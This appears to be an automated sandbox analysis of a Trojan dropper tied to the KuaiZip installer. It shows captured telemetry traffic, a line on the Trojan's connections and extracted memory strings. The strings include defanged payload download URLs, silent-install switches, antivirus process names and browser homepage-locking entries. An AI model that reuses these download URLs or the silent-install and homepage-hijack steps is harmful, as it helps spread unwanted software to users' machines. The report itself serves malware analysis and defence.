POST /kuaizipreport/online?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCUU0MjgzMjE4NzU1QkMzN0U1Q0E4ODg3NUY5MUJFMzczCSgwPVhQMywxPWFkbSwyPTE0NjAzOTcyNzMsMTQ2MDM5NzI5NiwxNDYwMzk3MzAwKQ== HTTP/1.1
Host: tj.kpzip.com
Accept: */*
Content-Length: 0
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Mon, 11 Apr 2016 17:52:17 GMT
c..{"status":1}..0..
GET /stat/index.php?pcid=630eda2537585b8645a6e7879b8a0d8b&app=kuaizip&ver=2.8.14.2&channel=union123_0088&category=KuaiZip.exe&act=app_open&p1=&p2=&key=2f5e2aa5d66794c2de4340db01f67516 HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Host: stat.kpzip.com
Cache-Control: no-cache
HTTP/1.1 400 Bad Request
Server: nginx/1.4.1
Date: Mon, 11 Apr 2016 17:53:11 GMT
Content-Type: text/html
Content-Length: 172
Connection: close
<html>..<head><title>400 Bad Request</title></head>..<body bgcolor="white">..<center><h1>400 Bad Request</h1></center>..<hr><center>nginx/1.4.1</center>..</body>..</html>....
POST /kuaizipreport/install?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCTEJMAlFNDI4MzIxODc1NUJDMzdFNUNBODg4NzVGOTFCRTM3MwkxCUt1YWlaaXBfU2V0dXBfdW5pb24xMjNfMDA4OC5leGUJL0ppbmdNbw== HTTP/1.1
Host: tj.kpzip.com
Accept: */*
Content-Length: 0
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Mon, 11 Apr 2016 17:52:17 GMT
c..{"status":1}..0..
GET /large/6da25678gw1f1l5qvobehj20c80gbnpk.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: ww4.sinaimg.cn
HTTP/1.1 200 OK
Date: Mon, 11 Apr 2016 17:52:24 GMT
Server: PWS/8.1.36
X-Px: ms h0-s1150.p11-fra ( h0-s1158.p11-fra), ht-d h0-s1158.p11-fra.cdngp.net
Cache-Control: max-age=7776000
Expires: Sun, 05 Jun 2016 17:55:35 GMT
Age: 3023809
Accept-Ranges: bytes
Content-Length: 9059732
Content-Type: image/jpeg
Last-Modified: Mon, 08 Jul 2013 18:06:40 GMT
X-Via-CDN: f=TXCDN,s=151.249.89.195,c=37.57.16.189
Connection: keep-alive
......JFIF.............C....................................................................C.......................................................................K....".........................................L.........................!1.AQ.."aq..2...B...#...3Rbr..$C....%....S&45c....................................;.......................!..1.."AQa2q........#B...3.R.$Kr............?.... ...k....Y _o.#P.@@....$..!..SP...@...(..d9"J.T..nQ..[%.F. Y.|. .8@y%.!.G......l....M.$.(..0...C.$.....\.... .[..$J....E.]/.h@E.N...$ y.d.HjSX.d.).P...>in.@.&. <....hE.-..... ..!..........$o......B ........HB...........[D.@BI$...}...T.]-..R%"...t.Q.P.M.%"uA..\.v.].......K.).&...4.{.4.........t@!J. 7N..D".4~.s.h.n.I..E.H$7G.k...l.E4A.W..%k&6!jQ..B.4p.A... .!..Gd..j.WB.&....4JjWM../$..).;.....4.$..PG..BKt.@A...u.@..#..=...."....M...\.B.....I±.Dv......A..D...!......(.W@......$...}.v)..A...Z.]1.Hl..@.c..:..@.. ..<...M..)n..;f..rJ.(...4A..$R...".$.\..`.d.G`...BH..V....D%. .4.#R.J.....J....[%t6D..nR(..4...H.i....I5.WF.sI!..n.@$ .H .@B....d?$....7.h... ..=RHC..H..!...b..J.....)...k..d.$...&.O.....!t......\uK...B.....j.lxJ[..I5.[z..I....M.Cdo.D...I"......%1.......i..hV. ...4@)$u.I$.%..I]6..{.wI .!..n.) ..i.Q.[&...!.N. BB.A X#. ..[......RCr...6..d.....D.CC....4D.........Cd.H$...&.$..4.@..\. .(. .{.....W@.%pSG$.n.47..w@p..^.%.... ...t.c.........BJW@n.M...Ct...h.A-.D.].B..d...J.A-.$..mR..._..a..B...].`.r.G4.I'K].t\...."...........).5"N......<2X..3..r$hoR7.?.UtG.B....!u.b<}GF.d.H..V.D.:.@E.6S...:jx..el......m....Mp.].s
<<< skipped >>>
POST /kuaizipreport/jingpin?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCTIzNDVoYW96aXAtMDAwfDM2MHppcC0wMDB8N3otMDAwfFdpblJBUi0wMDB8MzYwQVFXUy0wMDA= HTTP/1.1
Host: tj.kpzip.com
Accept: */*
Content-Length: 0
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Mon, 11 Apr 2016 17:52:22 GMT
c..{"status":1}..0..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_756:
`.rsrc
`.rsrc
t$(SSh
t$(SSh
~%UVW
~%UVW
.tTPV
.tTPV
FTPjK
FTPjK
FtPj;
FtPj;
F.PjRWj
F.PjRWj
u.WWj
u.WWj
u.VVj
u.VVj
u$SShe
u$SShe
ole32.dll
ole32.dll
urlmon
urlmon
user32.dll
user32.dll
shell32.dll
shell32.dll
RegOpenKeyA
RegOpenKeyA
RegEnumKeyA
RegEnumKeyA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
URLDownloadToFileA
URLDownloadToFileA
D:\dream
D:\dream
D:\dream\winky.log
D:\dream\winky.log
D:\dream\win1.log
D:\dream\win1.log
360tray.exe
360tray.exe
D:\dream\winbj.log
D:\dream\winbj.log
QQPCTray.exe
QQPCTray.exe
kxetray.exe
kxetray.exe
C:\Users\Public\Desktop\2345
C:\Users\Public\Desktop\2345
%Documents and Settings%\All Users\
%Documents and Settings%\All Users\
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall\
Software\Microsoft\Windows\CurrentVersion\Uninstall\
Windows
Windows
C:\Users\Public\Desktop\UC
C:\Users\Public\Desktop\UC
C:\Users\Public\Desktop\
C:\Users\Public\Desktop\
D:\dream\winzy.log
D:\dream\winzy.log
hXXp://down.ads9158.com:9000/go6.asp?userid=35658
hXXp://down.ads9158.com:9000/go6.asp?userid=35658
hXXp://z4.cnzz.com/stat.htm?id=1254275646
hXXp://z4.cnzz.com/stat.htm?id=1254275646
WinHttp.WinHttpRequest.5.1
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
hXXp://z11.cnzz.com/stat.htm?id=1254275435
hXXp://z11.cnzz.com/stat.htm?id=1254275435
D:\dream\ky
D:\dream\ky
hXXp://t.cn/RGHZNbv
hXXp://t.cn/RGHZNbv
D:\dream\Kuaizip_Setup_union123_0088.exe
D:\dream\Kuaizip_Setup_union123_0088.exe
D:\dream\KuaiZip_Setup_union123_0088.exe /JingMo
D:\dream\KuaiZip_Setup_union123_0088.exe /JingMo
D:\dream\KuaiZip_Setup_union123_0088.exe
D:\dream\KuaiZip_Setup_union123_0088.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-4278381565-3782908184-2563460023-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-4278381565-3782908184-2563460023-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-442436397-1971995177-210813084-500\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-442436397-1971995177-210813084-500\Software\Microsoft\Windows\CurrentVersion\Uninstall
D:\dream\ky.bat
D:\dream\ky.bat
hXXp://z13.cnzz.com/stat.htm?id=1256550373
hXXp://z13.cnzz.com/stat.htm?id=1256550373
D:\dream\b2.bat
D:\dream\b2.bat
D:\dream\2k1
D:\dream\2k1
hXXp://t.cn/RGHZM4u
hXXp://t.cn/RGHZM4u
D:\dream\2k2
D:\dream\2k2
hXXp://t.cn/RGHZx7C
hXXp://t.cn/RGHZx7C
D:\dream\k1
D:\dream\k1
D:\dream\k2
D:\dream\k2
D:\dream\2345pic_k1252705.exe
D:\dream\2345pic_k1252705.exe
D:\dream\2345pic_k1252705.exe -s1
D:\dream\2345pic_k1252705.exe -s1
2345pic_k1252705.exe
2345pic_k1252705.exe
C:\Users\
C:\Users\
%Documents and Settings%\
%Documents and Settings%\
D:\dream\1.bat
D:\dream\1.bat
hXXp://z4.cnzz.com/stat.htm?id=1254275459
hXXp://z4.cnzz.com/stat.htm?id=1254275459
D:\dream\dd2b1
D:\dream\dd2b1
hXXp://t.cn/RGHZ6Au
hXXp://t.cn/RGHZ6Au
D:\dream\dd2b2
D:\dream\dd2b2
hXXp://t.cn/RGHZ6YL
hXXp://t.cn/RGHZ6YL
D:\dream\dd2b3
D:\dream\dd2b3
hXXp://t.cn/RGHZXw9
hXXp://t.cn/RGHZXw9
D:\dream\dd2b4
D:\dream\dd2b4
hXXp://t.cn/RGHZXXJ
hXXp://t.cn/RGHZXXJ
D:\dream\dd2b5
D:\dream\dd2b5
hXXp://t.cn/RGHZXms
hXXp://t.cn/RGHZXms
D:\dream\dd2b6
D:\dream\dd2b6
hXXp://t.cn/RGHZaUC
hXXp://t.cn/RGHZaUC
D:\dream\dd2b7
D:\dream\dd2b7
hXXp://t.cn/RGHZaOe
hXXp://t.cn/RGHZaOe
D:\dream\2b1
D:\dream\2b1
D:\dream\2b2
D:\dream\2b2
D:\dream\2b3
D:\dream\2b3
D:\dream\2b4
D:\dream\2b4
D:\dream\2b5
D:\dream\2b5
D:\dream\2b6
D:\dream\2b6
D:\dream\2b7
D:\dream\2b7
D:\dream\2345explorer_k1252705.exe
D:\dream\2345explorer_k1252705.exe
D:\dream\2345explorer_k1252705.exe -s1
D:\dream\2345explorer_k1252705.exe -s1
2345explorer_k1252705.exe
2345explorer_k1252705.exe
D:\dream\d2b.bat
D:\dream\d2b.bat
hXXp://z13.cnzz.com/stat.htm?id=1256619493
hXXp://z13.cnzz.com/stat.htm?id=1256619493
D:\dream\uc1
D:\dream\uc1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc1?public&code=8c8c3cd80ce9a0c57c016bb58fbe1fe5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc1?public&code=8c8c3cd80ce9a0c57c016bb58fbe1fe5
D:\dream\uc2
D:\dream\uc2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc2?public&code=88e179c33b3a9af4521dd59e1bd78eb9
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc2?public&code=88e179c33b3a9af4521dd59e1bd78eb9
D:\dream\uc3
D:\dream\uc3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc3?public&code=9938d6a66783aa39f17544f8dec6cf72
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc3?public&code=9938d6a66783aa39f17544f8dec6cf72
D:\dream\uc4
D:\dream\uc4
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc4?public&code=152db8e9d36a28926ca9eb531995d289
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc4?public&code=152db8e9d36a28926ca9eb531995d289
D:\dream\uc5
D:\dream\uc5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc5?public&code=427d9e5007c4afb93302343de4f0ac69
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc5?public&code=427d9e5007c4afb93302343de4f0ac69
D:\dream\uc6
D:\dream\uc6
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc6?public&code=428fcf54b656f33b1a89098eda969ff3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/uc2/uc6?public&code=428fcf54b656f33b1a89098eda969ff3
D:\dream\lgeuc
D:\dream\lgeuc
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/lge/lge?public&code=411f778b2af125c63e48c0bafb370ced
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/lge/lge?public&code=411f778b2af125c63e48c0bafb370ced
D:\dream\BlueInstaller_bsvalkkx_101101_.exe
D:\dream\BlueInstaller_bsvalkkx_101101_.exe
D:\dream\BlueResource.bpk
D:\dream\BlueResource.bpk
set "w71=Microsoft\Windows\Start Menu\Programs"
set "w71=Microsoft\Windows\Start Menu\Programs"
set "w72=Microsoft\Windows\Start Menu"
set "w72=Microsoft\Windows\Start Menu"
"%USERPROFILE%\%xp1%"
"%USERPROFILE%\%xp1%"
"%ALLUSERSPROFILE%\%xp1%"
"%ALLUSERSPROFILE%\%xp1%"
"%USERPROFILE%\%xp2%"
"%USERPROFILE%\%xp2%"
"%ALLUSERSPROFILE%\%xp2%"
"%ALLUSERSPROFILE%\%xp2%"
reg add "HKEY_CURRENT_USER\Software\HomeSafe" /v "StartFlagNoTip" /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\HomeSafe" /v "StartFlagNoTip" /t REG_DWORD /d 1 /f
D:\dream\uc.bat
D:\dream\uc.bat
" URL="hXXp://VVV.hao123.com/?tn=96468612_hao_pg" IsLock="TRUE" />
" URL="hXXp://VVV.hao123.com/?tn=96468612_hao_pg" IsLock="TRUE" />
" URL="hXXp://VVV.hao123.com/?tn=97215765_hao_pg" IsLock="TRUE" />
" URL="hXXp://VVV.hao123.com/?tn=97215765_hao_pg" IsLock="TRUE" />
" URL="hXXp://hao.360.cn/?src=lm&ls=n6f9da49b8f" IsLock="TRUE" />
" URL="hXXp://hao.360.cn/?src=lm&ls=n6f9da49b8f" IsLock="TRUE" />
" URL="hXXp://VVV.hao123.com/?tn=96074770_hao_pg" IsLock="TRUE" />
" URL="hXXp://VVV.hao123.com/?tn=96074770_hao_pg" IsLock="TRUE" />
" URL="hXXp://VVV.hao123.com/?tn=96982550_hao_pg" IsLock="TRUE" />
" URL="hXXp://VVV.hao123.com/?tn=96982550_hao_pg" IsLock="TRUE" />
" URL="hXXp://VVV.hao123.com/?tn=95621234_hao_pg" IsLock="TRUE" />
" URL="hXXp://VVV.hao123.com/?tn=95621234_hao_pg" IsLock="TRUE" />
C:\ProgramData\HomeSafe\start_config.xml
C:\ProgramData\HomeSafe\start_config.xml
%Documents and Settings%\All Users\Application Data\HomeSafe\start_config.xml
%Documents and Settings%\All Users\Application Data\HomeSafe\start_config.xml
hXXp://z11.cnzz.com/stat.htm?id=1254275466
hXXp://z11.cnzz.com/stat.htm?id=1254275466
D:\dream\js1
D:\dream\js1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/js1/js1?public&code=b1ee60115a4f70d315a979e9b6845c55
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/js1/js1?public&code=b1ee60115a4f70d315a979e9b6845c55
D:\dream\js2
D:\dream\js2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/js1/js2?public&code=d6b869e3aa48ef860876b5403764d3d8
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/js1/js2?public&code=d6b869e3aa48ef860876b5403764d3d8
D:\dream\js3
D:\dream\js3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/js1/js3?public&code=20b0530111249bd0649013a5f42afc61
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/js1/js3?public&code=20b0530111249bd0649013a5f42afc61
D:\dream\duba_u20862342_sv1_3_18.exe
D:\dream\duba_u20862342_sv1_3_18.exe
hXXp://z13.cnzz.com/stat.htm?id=1256627376
hXXp://z13.cnzz.com/stat.htm?id=1256627376
D:\dream\bjzy
D:\dream\bjzy
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/bjzy3?public&code=bdda3f78ed99e24e0f6f6913dc30f240
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/bjzy3?public&code=bdda3f78ed99e24e0f6f6913dc30f240
D:\dream\LockPage.exe
D:\dream\LockPage.exe
hXXp://z11.cnzz.com/stat.htm?id=1256550363
hXXp://z11.cnzz.com/stat.htm?id=1256550363
::0:0@>@>:0:0:
::0:0@>@>:0:0:
xjj%uI
xjj%uI
:0@>@>:0:0:
:0@>@>:0:0:
4qP.rk%
4qP.rk%
B&.Ct
B&.Ct
%d&&'
%d&&'
123456789
123456789
00003333
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
1.2.18
1.2.18
%*.*f
%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
portuguese-brazilian
portuguese-brazilian
iphlpapi.dll
iphlpapi.dll
SHLWAPI.dll
SHLWAPI.dll
MPR.dll
MPR.dll
.PAVCException@@
.PAVCException@@
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
Kernel32.dll
Kernel32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
.PAVCFileException@@
.PAVCFileException@@
: %d]
: %d]
(*.*)|*.*||
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
out.prn
out.prn
(*.prn)|*.prn|
(*.prn)|*.prn|
%d.%d
%d.%d
%d/%d
%d/%d
1.6.9
1.6.9
unsupported zlib version
unsupported zlib version
png_read_image: unsupported transformation
png_read_image: unsupported transformation
%d / %d
%d / %d
Bogus message code %d
Bogus message code %d
libpng error: %s
libpng error: %s
libpng warning: %s
libpng warning: %s
1.1.3
1.1.3
bad keyword
bad keyword
libpng does not support gamma background rgb_to_gray
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
Palette is NULL in indexed image
(%d-%d):
(%d-%d):
%ld%c
%ld%c
(*.avi)|*.avi
(*.avi)|*.avi
WPFT532.CNV
WPFT532.CNV
WPFT632.CNV
WPFT632.CNV
EXCEL32.CNV
EXCEL32.CNV
write32.wpc
write32.wpc
Windows Write
Windows Write
mswrd632.wpc
mswrd632.wpc
Word for Windows 6.0
Word for Windows 6.0
wword5.cnv
wword5.cnv
Word for Windows 5.0
Word for Windows 5.0
mswrd832.cnv
mswrd832.cnv
mswrd632.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
Word 6.0/95 for Windows & Macintosh
html32.cnv
html32.cnv
VVV.dywt.com.cn
VVV.dywt.com.cn
Service Pack %d
Service Pack %d
Windows 2003
Windows 2003
Windows XP
Windows XP
Windows 2000
Windows 2000
Windows NT
Windows NT
Windows ??
Windows ??
Windows Millenium Edition
Windows Millenium Edition
Windows 98 Second Edition
Windows 98 Second Edition
Windows 98 SP1
Windows 98 SP1
Windows 98
Windows 98
Windows 95 OSR2
Windows 95 OSR2
Windows 95 SP1
Windows 95 SP1
Windows 95
Windows 95
Windows CE
Windows CE
Microsoft Windows Me
Microsoft Windows Me
Microsoft Windows 98
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows 95
Windows Server 2008 R2
Windows Server 2008 R2
Windows 7
Windows 7
Windows Server 2008
Windows Server 2008
Windows Vista
Windows Vista
Microsoft Windows 2003
Microsoft Windows 2003
Microsoft Windows XP
Microsoft Windows XP
Microsoft Windows 2000
Microsoft Windows 2000
Microsoft Windows NT
Microsoft Windows NT
KERNEL32.DLL
KERNEL32.DLL
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÃ
zcÃ
c:\%original file name%.exe
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
GetCPInfo
GetWindowsDirectoryA
GetWindowsDirectoryA
WinExec
WinExec
GetProcessHeap
GetProcessHeap
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
GetViewportExtEx
GetViewportExtEx
GetViewportOrgEx
GetViewportOrgEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
ShellExecuteA
ShellExecuteA
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
SetWindowsHookExA
SetWindowsHookExA
UnhookWindowsHookEx
UnhookWindowsHookEx
CreateDialogIndirectParamA
CreateDialogIndirectParamA
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
g[Key
g[Key
@/2222$.
@/2222$.
^/22/2222
^/22/2222
PAD
PAD
ADVAPI32.dll
ADVAPI32.dll
AVIFIL32.dll
AVIFIL32.dll
COMCTL32.dll
COMCTL32.dll
comdlg32.dll
comdlg32.dll
GDI32.dll
GDI32.dll
MSVFW32.dll
MSVFW32.dll
OLEAUT32.dll
OLEAUT32.dll
RASAPI32.dll
RASAPI32.dll
SHELL32.dll
SHELL32.dll
USER32.dll
USER32.dll
VERSION.dll
VERSION.dll
WININET.dll
WININET.dll
WINMM.dll
WINMM.dll
WINSPOOL.DRV
WINSPOOL.DRV
WS2_32.dll
WS2_32.dll
(*.*)
(*.*)
7.6.3.2
7.6.3.2
%original file name%.exe_756_rwx_00401000_00140000:
t$(SSh
t$(SSh
~%UVW
~%UVW
.tTPV
.tTPV
FTPjK
FTPjK
FtPj;
FtPj;
F.PjRWj
F.PjRWj
u.WWj
u.WWj
u.VVj
u.VVj
u$SShe
u$SShe
ole32.dll
ole32.dll
urlmon
urlmon
user32.dll
user32.dll
shell32.dll
shell32.dll
RegOpenKeyA
RegOpenKeyA
RegEnumKeyA
RegEnumKeyA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
URLDownloadToFileA
URLDownloadToFileA
D:\dream
D:\dream
D:\dream\winky.log
D:\dream\winky.log
D:\dream\win1.log
D:\dream\win1.log
360tray.exe
360tray.exe
D:\dream\winbj.log
D:\dream\winbj.log
QQPCTray.exe
QQPCTray.exe
kxetray.exe
kxetray.exe
C:\Users\Public\Desktop\2345
C:\Users\Public\Desktop\2345
%Documents and Settings%\All Users\
%Documents and Settings%\All Users\
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall\
Software\Microsoft\Windows\CurrentVersion\Uninstall\
Windows
Windows
C:\Users\Public\Desktop\UC
C:\Users\Public\Desktop\UC
C:\Users\Public\Desktop\
C:\Users\Public\Desktop\
D:\dream\winzy.log
D:\dream\winzy.log
hXXp://down.ads9158.com:9000/go6.asp?userid=35658
hXXp://down.ads9158.com:9000/go6.asp?userid=35658
hXXp://z4.cnzz.com/stat.htm?id=1254275646
hXXp://z4.cnzz.com/stat.htm?id=1254275646
WinHttp.WinHttpRequest.5.1
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
hXXp://z11.cnzz.com/stat.htm?id=1254275435
hXXp://z11.cnzz.com/stat.htm?id=1254275435
D:\dream\ky
D:\dream\ky
hXXp://t.cn/RGHZNbv
hXXp://t.cn/RGHZNbv
D:\dream\Kuaizip_Setup_union123_0088.exe
D:\dream\Kuaizip_Setup_union123_0088.exe
D:\dream\KuaiZip_Setup_union123_0088.exe /JingMo
D:\dream\KuaiZip_Setup_union123_0088.exe /JingMo
D:\dream\KuaiZip_Setup_union123_0088.exe
D:\dream\KuaiZip_Setup_union123_0088.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-4278381565-3782908184-2563460023-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall
